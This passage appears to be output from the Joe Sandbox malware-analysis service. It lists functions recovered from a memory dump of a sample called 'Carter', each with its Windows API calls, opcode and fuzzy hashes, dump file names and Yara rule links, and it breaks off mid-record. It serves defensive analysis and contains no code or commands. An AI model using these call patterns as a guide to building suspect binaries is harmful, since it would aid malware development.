Opcode Fuzzy Hash: 87c1081a924756c9b52c4741284aa813beec56e79635191942e99491c781c057
Instruction Fuzzy Hash: 3311E23A200345AFCB25AF74DC49E7E77B8FF46360B51402AF806CB2A0EB719941D791

Function 00C25312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C25331

Part of subcall function 00C1593C: __FF_MSGBANNER.LIBCMT ref: 00C15953
Part of subcall function 00C1593C: __NMSG_WRITE.LIBCMT ref: 00C1595A
Part of subcall function 00C1593C: RtlAllocateHeap.NTDLL(01440000,00000000,00000001,?,00000004,?,?,00C11003,?), ref: 00C1597F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 633e13278ce59393554d906fad914fc17174d4fda61a4e5e36255433bd6b84f6
Instruction ID: c5ea4938dd299b59a11d593f248fe951f8304dd88163dc32a2f10b1fca6b742f
Opcode Fuzzy Hash: 633e13278ce59393554d906fad914fc17174d4fda61a4e5e36255433bd6b84f6
Instruction Fuzzy Hash: E811A332509B26EFCB217F70BC0579F3798AF153A0F205529F8589A5B0DEB0CA85B790

Function 00C54365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00C54385
_memset.LIBCMT ref: 00C543A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00C543F8
CloseHandle.KERNEL32(00000000), ref: 00C54401

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: eeeb3b928dd80a85fc5b9d2cc56ce7a6244e61685bdd06af6acc64d950541c26
Instruction ID: 3cb3c14169b9ab05ad3e56e82e5f242c94bacb5cfa4c9eba48dfda605a02d78f
Opcode Fuzzy Hash: eeeb3b928dd80a85fc5b9d2cc56ce7a6244e61685bdd06af6acc64d950541c26
Instruction Fuzzy Hash: 7D11E775901228BAD7309BA5AC4DFEFBB7CEF45724F10459AF908E7190D2704EC48BA8

Function 00C66A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57E51,?,?,00000000), ref: 00C04041
Part of subcall function 00C0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57E51,?,?,00000000,?,?), ref: 00C04065

gethostbyname.WSOCK32(?,?,?), ref: 00C66A84
WSAGetLastError.WSOCK32(00000000), ref: 00C66A8F
_memmove.LIBCMT ref: 00C66ABC
inet_ntoa.WSOCK32(?), ref: 00C66AC7

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 552f631153579a46ca020bba3ccfe1e2da51457707e08280d74ea85dd9e543d6
Instruction ID: 98c93092c669e3418716a6f0cd84c87dc1e8c068859b6410f42e0492e8440078
Opcode Fuzzy Hash: 552f631153579a46ca020bba3ccfe1e2da51457707e08280d74ea85dd9e543d6
Instruction Fuzzy Hash: AA113376500109AFCB14FBA4CD86DEEB7B8EF14310B144165F606A72A2DF319E54EBA1

Function 00C496F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C49719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C4972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C49741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C4975C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a9c91caa2b2e96bd64db07e5c6375b72bfc62d0168c100d543b686c8e1148b67
Instruction ID: ca9b9535363fffe6aff0a7c644120d5b41204bf8db700aee06f9ed7ceb66c980
Opcode Fuzzy Hash: a9c91caa2b2e96bd64db07e5c6375b72bfc62d0168c100d543b686c8e1148b67
Instruction Fuzzy Hash: B4115A39900228FFEB10DF95CD84F9EBBB8FB48710F204091E900B7290D6716E10DB94

Function 00BF166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

DefDlgProcW.USER32(?,00000020,?), ref: 00BF16B4
GetClientRect.USER32(?,?), ref: 00C2B93C
GetCursorPos.USER32(?), ref: 00C2B946
ScreenToClient.USER32(?,?), ref: 00C2B951

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: dd09ad63a3dabc09ee1372a89bcd1f6513976bb40c31e8b54bf4a0b845b14e3a
Instruction ID: fc0227fa282382254e613024d71bffcb542091079b11a34714d8655d6aa08729
Opcode Fuzzy Hash: dd09ad63a3dabc09ee1372a89bcd1f6513976bb40c31e8b54bf4a0b845b14e3a
Instruction Fuzzy Hash: 7B114336A0001DFBCB00EF98C885ABE77B8EB44301F544999FA01E7240C730BA59CBA5

Function 00BF2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
GetStockObject.GDI32(00000011), ref: 00BF2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 60e28178d0c6f5f5efbbc71a9a94070e0be48b83f9a26749bef31dc55d8c631c
Instruction ID: a5f9baa50db3973816d985bdeb03a4fa3446d3476e28c3a517803379bfbd3113
Opcode Fuzzy Hash: 60e28178d0c6f5f5efbbc71a9a94070e0be48b83f9a26749bef31dc55d8c631c
Instruction Fuzzy Hash: 4A118B7250110DBFDB024F90DC84FEA7BA9EF58364F150245FB0462050C7319D64EBA4

Function 00C51941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C504EC,?,00C5153F,?,00008000), ref: 00C5195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C504EC,?,00C5153F,?,00008000), ref: 00C51983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C504EC,?,00C5153F,?,00008000), ref: 00C5198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00C504EC,?,00C5153F,?,00008000), ref: 00C519C0

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 0138f744b369bed4882d86640bed4ded2c8716fdff0779d84f60a50720f3f8f1
Instruction ID: 1ce6d2b59a3bd1e7edec6dd76efe279b9cc9f1130c25d79a53ac10cc9f9f4604
Opcode Fuzzy Hash: 0138f744b369bed4882d86640bed4ded2c8716fdff0779d84f60a50720f3f8f1
Instruction Fuzzy Hash: BD114835C04518EBCF009FA5D99CBEEBB78BF09712F184045ED80B2240CB309698CB99

Function 00C7E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C7E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00C7E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00C7E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00C7E234

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 4acef7e987c3c5273a8497df0c9b2541126275dc65a047009e9631023fffad1f
Instruction ID: 4d8420a8f02ba26d78279f4f78ea0ad2e87c5d4719485e0f16867d517c4c7a5a
Opcode Fuzzy Hash: 4acef7e987c3c5273a8497df0c9b2541126275dc65a047009e9631023fffad1f
Instruction Fuzzy Hash: 011165B6245304DBE3308F51DD0CF977BBCEB44B04F10C599A619D6452D7B0E548DB91

Function 00C271E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C2720B

Part of subcall function 00C278F2: __fltout2.LIBCMT ref: 00C2791B

__cftog_l.LIBCMT ref: 00C27231
__cftoe_l.LIBCMT ref: 00C27263

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 56a6259fe3ccb7ca9a6f1c36140758d2c9e4f9767970a8829cbc5aaca5738a37
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: BF01953204815EFBCF165E84EC82CED3F22BB19340B448615FA2858931C336CAB1BB81

Function 00C7B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C7B956
ScreenToClient.USER32(?,?), ref: 00C7B96E
ScreenToClient.USER32(?,?), ref: 00C7B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C7B9AD

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: a996bbddd208c0ca091a81c48ead2b091b9648428f1d722569af11d2eaf34b0e
Instruction ID: a1c39a4b315fe6bbee7fb74412d8091936f88e4d8aec98b3a4984c07944c3f58
Opcode Fuzzy Hash: a996bbddd208c0ca091a81c48ead2b091b9648428f1d722569af11d2eaf34b0e
Instruction Fuzzy Hash: 651144B9D00209EFDB41CF98C984AEEBBF9FF48311F108156E924E3610E735AA658F54

Function 00C7BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C7BCB6
_memset.LIBCMT ref: 00C7BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00CB8F20,00CB8F64), ref: 00C7BCF4
CloseHandle.KERNEL32 ref: 00C7BD06

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 5fff16e9cf81410e367e5c3e7c1462422263693b7644eb4e9c91eb7e17102b9a
Instruction ID: 32ea3ac562f66c6930eff4d959bb76fd70b3fb2db20b7ee4c33f2e4e77274951
Opcode Fuzzy Hash: 5fff16e9cf81410e367e5c3e7c1462422263693b7644eb4e9c91eb7e17102b9a
Instruction Fuzzy Hash: D6F05EF26403047FE7506BA1AC05FFF3B5DEB09754F000521BA08D61A6DB718C14D7A8

Function 00C57195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C571A1

Part of subcall function 00C57C7F: _memset.LIBCMT ref: 00C57CB4

_memmove.LIBCMT ref: 00C571C4
_memset.LIBCMT ref: 00C571D1
LeaveCriticalSection.KERNEL32(?), ref: 00C571E1

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: a1d43b20ef649bbbe6e22585a302c00198f05cf24bcc9131a0cca0602c9f06de
Instruction ID: b923f8cbb0a75c976f0d7ba1f7ba21f59055a9b781440150f0508164fd1d01f2
Opcode Fuzzy Hash: a1d43b20ef649bbbe6e22585a302c00198f05cf24bcc9131a0cca0602c9f06de
Instruction Fuzzy Hash: E7F0547A200100ABCF416F55DC85B8ABB29EF49321F08C055FE085E22BC735E955EBB8

Function 00C7C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1738
Part of subcall function 00BF16CF: BeginPath.GDI32(?), ref: 00BF174F
Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C7C3E8
LineTo.GDI32(00000000,?,?), ref: 00C7C3F5
EndPath.GDI32(00000000), ref: 00C7C405
StrokePath.GDI32(00000000), ref: 00C7C413

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 2dd7ddc9383e5b47fdb98ccb928d9fa741d972f54807fe76313acd3c74d8e6b6
Instruction ID: 6fa941b435fcd85601a61b4378def4a8790def2aa85b676ca66e9b0d334031b2
Opcode Fuzzy Hash: 2dd7ddc9383e5b47fdb98ccb928d9fa741d972f54807fe76313acd3c74d8e6b6
Instruction Fuzzy Hash: 2CF0E232005219BBDB132F54AC0DFDE3F59AF05311F148100FA11610E183755658EFA9

Function 00C4AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C4AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4AA82
GetCurrentThreadId.KERNEL32 ref: 00C4AA89
AttachThreadInput.USER32(00000000), ref: 00C4AA90

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d7fad91d2992892e86e64de65c242411c57b91720e6ce6ccd82867f666ea5f36
Instruction ID: 7cb2a0e6b9bdf531d77784e23d103f767bc32271ffaa1f4f33175ff415ac5443
Opcode Fuzzy Hash: d7fad91d2992892e86e64de65c242411c57b91720e6ce6ccd82867f666ea5f36
Instruction Fuzzy Hash: 92E03932581228BADB615FA29D0CFEB7F1CFF127A1F108011F91984050D771CA54DBA4

Function 00BF25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BF260D
SetTextColor.GDI32(?,000000FF), ref: 00BF2617
SetBkMode.GDI32(?,00000001), ref: 00BF262C
GetStockObject.GDI32(00000005), ref: 00BF2634
GetWindowDC.USER32(?,00000000), ref: 00C2C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00C2C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00C2C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00C2C203
GetPixel.GDI32(00000000,?,?), ref: 00C2C223
ReleaseDC.USER32(?,00000000), ref: 00C2C22E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 54838e3600b4ca6336c052ec3c4882964f81a1338ea81d427cd47628f289edcb
Instruction ID: 201aef1e212c12319cb78699d40b779018ba9ae2db95828e20efbddddd7919dd
Opcode Fuzzy Hash: 54838e3600b4ca6336c052ec3c4882964f81a1338ea81d427cd47628f289edcb
Instruction Fuzzy Hash: 98E0E531504244BBDB615F64BC4D7DC3B11EB15731F14836AFA79580E187714A94DB15

Function 00C49330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C49339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C48F04), ref: 00C49340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C48F04), ref: 00C4934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C48F04), ref: 00C49354

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 8660fdcb8a4ee99365fa8e2b1b12545d795e0a1887fc7b2d669f3b97d1136945
Instruction ID: 91f39e56b917e93dc6de650ba74ce8778e6a92c5beb3fccf6d0e79ec988d6aae
Opcode Fuzzy Hash: 8660fdcb8a4ee99365fa8e2b1b12545d795e0a1887fc7b2d669f3b97d1136945
Instruction Fuzzy Hash: 50E086326012219FD7A01FB15D0DB5B3B6CFF517A1F214818F245CA0A0E7349448C754

Function 00C30679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C30679
GetDC.USER32(00000000), ref: 00C30683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C306A3
ReleaseDC.USER32(?), ref: 00C306C4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: feb687f0ff3c9944708e33aba446f255a911e25d43a2157c2e8eff2ce3a9c45c
Instruction ID: 805f2bfa857716db3077f048fbc415e222005e1f754f131ab7ab0e2c61a2c9e3
